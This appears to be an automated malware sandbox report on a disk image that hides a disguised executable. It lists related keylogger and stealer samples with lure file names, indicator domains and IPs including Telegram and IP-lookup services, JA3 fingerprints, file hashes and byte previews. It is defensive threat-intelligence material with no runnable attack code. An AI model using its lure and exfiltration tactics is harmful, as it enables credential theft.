                                                                                                                                                                                  CLOSURE.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                                                                  file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                                                                  7vbu8ZW8lFI8mn5.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                                                                  REVISED PROFORMA INVOICE STVC007934196.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                                                                  MT103-539 PAYMENT (1).docx.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                                                                  PaymentXConfirmationXcopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                                                                  SUAlTWPjKQ.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                                                                  SecuriteInfo.com.Win32.CrypterX-gen.11226.22760.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  • checkip.dyndns.org/

                                                                                                                                                                                  Domains

                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                  checkip.dyndns.comEKSTRE_1022.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                  • 193.122.6.168
                                                                                                                                                                                  Purchase Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                  • 193.122.6.168
                                                                                                                                                                                  Halkbank_Ekstre_20241022_081224_563756.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                  • 132.226.247.73
                                                                                                                                                                                  REVISED INVOICE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                  • 193.122.130.0
                                                                                                                                                                                  SIPARIS-290124.PDF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                                  • 132.226.8.169
                                                                                                                                                                                  Renommxterne.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                  • 158.101.44.242
                                                                                                                                                                                  PAYMENT ADVISE MT107647545.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                  • 193.122.6.168
                                                                                                                                                                                  Produccion.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                  • 132.226.247.73
                                                                                                                                                                                  080210232024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                  • 132.226.247.73
                                                                                                                                                                                  226999705-124613-sanlccjavap0004-67.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                  • 193.122.130.0
                                                                                                                                                                                  reallyfreegeoip.orgEKSTRE_1022.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                                  Purchase Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                                  Halkbank_Ekstre_20241022_081224_563756.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                                  REVISED INVOICE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                                  SIPARIS-290124.PDF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                                  Renommxterne.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                                  PAYMENT ADVISE MT107647545.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                                  Produccion.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                                  080210232024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                                  226999705-124613-sanlccjavap0004-67.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                                  api.telegram.orgPurchase Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                  kQyd2z80gD.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                  REVISED INVOICE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                  Produccion.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                  226999705-124613-sanlccjavap0004-67.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                  BT-036016002U_RFQ 014-010-02024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                  RFQ_64182MR_PDF.R00.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                  Circular_no_088_Annexure_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                  RTGS_UCB_DCCB_docx.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                  WBPWLAj09q.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  • 149.154.167.220

                                                                                                                                                                                  ASNs

                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                  TELEGRAMRUPurchase Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                  kQyd2z80gD.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                  REVISED INVOICE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                  Produccion.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                  226999705-124613-sanlccjavap0004-67.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                  BT-036016002U_RFQ 014-010-02024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                  RFQ_64182MR_PDF.R00.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                  Circular_no_088_Annexure_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                  RTGS_UCB_DCCB_docx.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                  WBPWLAj09q.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                  CLOUDFLARENETUSEXTERNALRoger Moczygemba shared DIRECT MED CLINIC - CONFIDENTIAL with you.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 104.18.94.41
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                  • 104.21.53.8
                                                                                                                                                                                  https://na2.docusign.net/Signing/EmailStart.aspx?a=c6104538-ac3b-4407-b24b-a0b641ee4589&etti=24&acct=7853161b-6814-4528-85bc-ffe96cfca42f&er=09ab18a7-8de5-4c92-931d-cb9cd9f7b00dGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 104.18.66.57
                                                                                                                                                                                  https://egift.activationshub.com/gift-card/view/8lPFUrjq1LGzg7JHwS8hJJRdLGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 172.67.68.47
                                                                                                                                                                                  http://hybrid-web.global.blackspider.com/urlwrap/?q=AXicLU67UsMwEFQBX0Gf0pbtkywxowHLiZgUDEXoGVmRjbFlJX4wk4bPgT-kJgpp9u72dnb35hZ9_SB0943Q2J8S1kTT-Bk53fbGD_Po-8h4h4C_yGb70WGgwAjaOz_q4TFAY41fhvk0mSXyY4Pe5_kw3cdxP3RRa-M8k0-72IqHZXZvRruDbptBrMLl7L5dnLAh60JMfhmNFbb3x0VfmFDBDrPYPO9Wtj--jtp0271IeaVxWlvNawq24rrmlPAKkyw3hGoetMLaNOFnloGugFFS1QmrM3IGAKg1DSLdBrM0veyzSMIsryXPOUnO_1-dYIUisgSKsdoknOWcZiBlmSvMVaZwLouSpIqRslBScsxYCkWZQUkobEByul4riRAivwj9ATUqckw&ZGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 104.26.11.204
                                                                                                                                                                                  https://1drv.ms/o/c/76471f3776916fd0/EomjtsItbi9Ag0bnzrJDx08BhxVWepFoAXrJFoYeR9IZ0A?e=5%3aEFCh5b&sharingv2=true&fromShare=true&at=9Get hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 104.21.56.85
                                                                                                                                                                                  sadfwqefrqw3f.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                                  SecuriteInfo.com.Heur.11787.148.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                  • 172.67.194.239
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                  • 172.67.206.204
                                                                                                                                                                                  https://www.canva.com/design/DAGUUU-VdiI/DdL4Z-_loK4X7NMMbGGnJg/view?utm_content=DAGUUU-VdiI&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 104.16.103.112
                                                                                                                                                                                  ORACLE-BMC-31898USEKSTRE_1022.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                  • 193.122.6.168
                                                                                                                                                                                  Purchase Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                  • 193.122.6.168
                                                                                                                                                                                  REVISED INVOICE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                  • 193.122.130.0
                                                                                                                                                                                  botnet.spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                  • 140.238.98.34
                                                                                                                                                                                  Renommxterne.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                  • 158.101.44.242
                                                                                                                                                                                  PAYMENT ADVISE MT107647545.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                  • 193.122.6.168
                                                                                                                                                                                  226999705-124613-sanlccjavap0004-67.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                  • 193.122.130.0
                                                                                                                                                                                  BT-036016002U_RFQ 014-010-02024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  • 193.122.130.0
                                                                                                                                                                                  RFQ_64182MR_PDF.R00.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                  • 193.122.6.168
                                                                                                                                                                                  la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 193.123.253.227

                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                  54328bd36c14bd82ddaa0c04b25ed9adEKSTRE_1022.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                  • 104.21.67.152
                                                                                                                                                                                  Purchase Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                  • 104.21.67.152
                                                                                                                                                                                  Halkbank_Ekstre_20241022_081224_563756.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                  • 104.21.67.152
                                                                                                                                                                                  SIPARIS-290124.PDF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                                  • 104.21.67.152
                                                                                                                                                                                  Renommxterne.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                  • 104.21.67.152
                                                                                                                                                                                  PAYMENT ADVISE MT107647545.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                  • 104.21.67.152
                                                                                                                                                                                  Produccion.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                  • 104.21.67.152
                                                                                                                                                                                  080210232024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                  • 104.21.67.152
                                                                                                                                                                                  226999705-124613-sanlccjavap0004-67.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                  • 104.21.67.152
                                                                                                                                                                                  BT-036016002U_RFQ 014-010-02024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  • 104.21.67.152
                                                                                                                                                                                  3b5074b1b5d032e5620f69f9f700ff0ehttps://na2.docusign.net/Signing/EmailStart.aspx?a=c6104538-ac3b-4407-b24b-a0b641ee4589&etti=24&acct=7853161b-6814-4528-85bc-ffe96cfca42f&er=09ab18a7-8de5-4c92-931d-cb9cd9f7b00dGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                  z14Employee_Contract_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                  Purchase Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                  Kostenvoranschlag.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                  Szacunek IMP29575 za eksport z ostatniego kwartalu.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                  kQyd2z80gD.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                  PO-Zam#U00f3wienie zakupu-8837837849-pl-.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                  https://www.yola.com/es/zendesk-sso?return_to=http://york.iwill.app.br/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                  Produccion.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                  xVmySfWfcW.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 149.154.167.220

                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                  No context

                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:modified
                                                                                                                                                                                  Size (bytes):1832
                                                                                                                                                                                  Entropy (8bit):5.209546127585902
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:YVJSGfs4/ymI4RfoUefa+gZ9trBLNGIAoc+CrW0RP:+IGH/vIIwLfMZPBRGl+6W0RP
                                                                                                                                                                                  MD5:30F1C3845D7260E0209CA4AF0CC01270
                                                                                                                                                                                  SHA1:2CE7D05401487BF9EF57876D90709C1DD8F5C12E
                                                                                                                                                                                  SHA-256:D86513AD1E90A80245B2545BBA936C4B17793AB21567C000899869518850D1E3
                                                                                                                                                                                  SHA-512:4DD399A976CA4752A0173FD1C646B5561A70D4AEC300FE1E8F7BAAC195DF0CA39C3807CE22028548CC4470726854C68D46286C57914E99EA39AB97CBD251A7A6
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Preview:@...e...........................................................T...............n$....<@.{..uR.......*.Microsoft.Management.Infrastructure.Native..H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0...............I.....B..ZR............System..4......................A....E..........System.Core.D................g$H..K..I.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4..................%`99B....9...........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P................1]...E...........(.Microsoft.PowerShell

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lju2uzly.zzm.psm1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lvrkm1qx.d3m.ps1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_psyybgkk.e0r.psm1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s3sb3z55.j0i.ps1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\turbinate

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:\Device\CdRom0\9236-pagaconferma-jpg.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):208384
                                                                                                                                                                                  Entropy (8bit):7.839491635195646
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3072:xkEDvAXhlKBt6N4ORDuWzi2GUXy3pKHyDQucvz5DUulrlAkfK+L+Xa18:JYLKBIzi2rC3phDVcvz5YerdfK+L+K6
                                                                                                                                                                                  MD5:8A2119C729ED9E3509D9AC770361D45B
                                                                                                                                                                                  SHA1:EEC173D4D359D01B95677A8E5F888878426E16AE
                                                                                                                                                                                  SHA-256:E0B8F12284F03EF1B6FDD27118DFE9E352FD05896B2A04EB902D3F09A3EBB4AC
                                                                                                                                                                                  SHA-512:B4D89FB2DBE5E872F2CC6C98B26A69944F3B76E8AE6A317AE52F1EB967C81057169F78EDB02BE430C5472D6F00620EF851FD018B6319B09FE20A1E92AA5DEA53
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...PE8HP2ND9..5B.JPXWTC0.F8HP6ND9RP5BOJPXWTC0PF8HP6ND9RP5BOJ.XWTM/.H8.Y.o.8....'##x'&,W"'Uh3W *V&pW'o8%6w=-...kh=Y*!._]?fOJPXWTCX@..d!.0hH...3.4b{(*|A.83..He5.,|D.1.!.)f`^.ZI...m-G.!.<}i+&z%.N./[ |G.:9RP5BOJPXWTC0PF8..(D9RPe.OJ.YST7.P.8HP6ND9R.5aNAQQWT.1PF.IP6ND9}.5BOZPXW.B0PFxHP&ND9PP5GOJPXWTC5PF8HP6NDIQP5FOJ.cUTA0P.8H@6NT9RP5ROJ@XWTC0PV8HP6ND9RP5B._RX.TC0P&:H.:OD9RP5BOJPXWTC0PF8HP6ND9RP..NJLXWTC0PF8HP6ND9RP5BOJPXWTC0P.5JPvND9RP5BOJPXW.B0.G8HP6ND9RP5BOJPXWTC0PF8HP6NjM7(ABOJH.VTC PF8.Q6N@9RP5BOJPXWTC0Pf8H0.< X&15B.'PXW.B0P(8HP.OD9RP5BOJPXWTCpPFxf4W:%9RP.rOJPxUTC&PF8BR6ND9RP5BOJPXW.C0.hJ;"UND9.\4BO*RXWZB0Pf:HP6ND9RP5BOJP.WT.0PF8HP6ND9RP5BOJPXWTC0PF8HP6ND9RP5BOJPXWTC0PF8HP6ND9RP5BOJPXWTC0PF8HP6ND9RP5BOJPXWTC0PF8HP6ND9RP5BOJPXWTC0PF8HP6ND9RP5BOJPXWTC0PF8HP6ND9RP5BOJPXWTC0PF8HP6ND9RP5BOJPXWTC0PF8HP6ND9RP5BOJPXWTC0PF8HP6ND9RP5BOJPXWTC0PF8HP6ND9RP5BOJPXWTC0PF8HP6ND9RP5BOJPXWTC0PF8HP6ND9RP5BOJPXWTC0PF8HP6ND9RP5BOJPXWTC0PF8HP6ND9RP5BOJPXWTC0PF8HP6ND9RP5BOJPXWTC0PF8HP6ND9RP5BOJPXWTC0PF8HP6ND9R

                                                                                                                                                                                  C:\Users\user\Desktop\tmp.log

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):303
                                                                                                                                                                                  Entropy (8bit):4.451203473208547
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6:wvMYFVEhAhme1ErQNnRC5hHg2a9IKm2Q06X//F:wvMYFVEhAhkZNg2a9JQ06XV
                                                                                                                                                                                  MD5:882C0680CE0CA2F499EAE8EE7C11EBF0
                                                                                                                                                                                  SHA1:763A49D9FAA9866DFE110BA0BED899F050A07DE5
                                                                                                                                                                                  SHA-256:4686CC042A497EED23C27DE04DD9CC2DA4288299CC34DFE6326C57006D8FE223
                                                                                                                                                                                  SHA-512:E11318FBCBC537AD6B7D32BBB609BE81E35A22C9B9E5706BCB301C9C4B2DFD95515965EE14EF5BA00679B49CB30566065603EE7119C8CEF13B964E57DC727EC4
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:....Attached : True..BlockSize : 0..DevicePath : \\.\CDROM0..FileSize : 1703936..ImagePath : C:\Users\user\Desktop\g1TLK7mbZD.img..LogicalSectorSize : 2048..Number : 0..Size : 1703936..StorageType : 1..PSComputerName : ........

                                                                                                                                                                                  \Device\CdRom0\9236-pagaconferma-jpg.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1155263
                                                                                                                                                                                  Entropy (8bit):7.393470208241103
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:ffmMv6Ckr7Mny5QLMwDMZE4mqu6p0DWsRmic2V993wZCA:f3v+7/5QLMLE2hq93wP
                                                                                                                                                                                  MD5:1AEFAA71B8996D22CAD66A84A7F279A0
                                                                                                                                                                                  SHA1:4EC6F2FE363B2C5422F684C0C2ABFDADDC25B781
                                                                                                                                                                                  SHA-256:227F6FFEC17185B0F15EF324705B35AB5859020ED58345FF63C59DBD5F1A0781
                                                                                                                                                                                  SHA-512:67081CF6EA7A56764B8D97610C69747B6EC352EA5B7C18EF717124D8B926C6394746AAD22C8590920479B9C8C8C0158ED9E0E320562E943A2E81F129AF615164
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 18%
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i.i.i..9.k.`.:.w.`.,...`.+.P.N%.c.N%.H.i.d.`. ./.w.:.k.w.;.h.i.8.h.`.>.h.Richi.........................PE..L.....K..........#..................c....... ....@..........................P......5!........@.......@.....................<...T.................................................................................... ..@............................text............................... ..`.rdata..\.... ......................@..@.data............h..................@....rsrc................H..............@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  Static File Info

                                                                                                                                                                                  General

                                                                                                                                                                                  File type:UDF filesystem data (version 1.5) 'DOCUMENTS'
                                                                                                                                                                                  Entropy (8bit):5.661957456506507
                                                                                                                                                                                  TrID:
                                                                                                                                                                                  • ImgBurn Image (2054048/1) 33.29%
                                                                                                                                                                                  • ImgBurn Image (2052548/1) 33.26%
                                                                                                                                                                                  • null bytes (2050048/1) 33.22%
                                                                                                                                                                                  • Photoshop Action (5010/6) 0.08%
                                                                                                                                                                                  • Lotus 123 Worksheet (generic) (2007/4) 0.03%
                                                                                                                                                                                  File name:g1TLK7mbZD.img
                                                                                                                                                                                  File size:1'703'936 bytes
                                                                                                                                                                                  MD5:213a8ce5aaa962f33a78f6053f6956ba
                                                                                                                                                                                  SHA1:339df70ab6152e4b20d81d4180943fc6fcb1f752
                                                                                                                                                                                  SHA256:5d4a99440308479e4b97797fc6518240e1617df62bb938d3f735026931d7bed3
                                                                                                                                                                                  SHA512:206b9ffea2e80b822f9d1f5cbc3963382416d8a0d681ac157eb2647e6f48c816e59469037c1c30ecec96beee14e366de367fcb6aa46a7a132a39ee06d6e89935
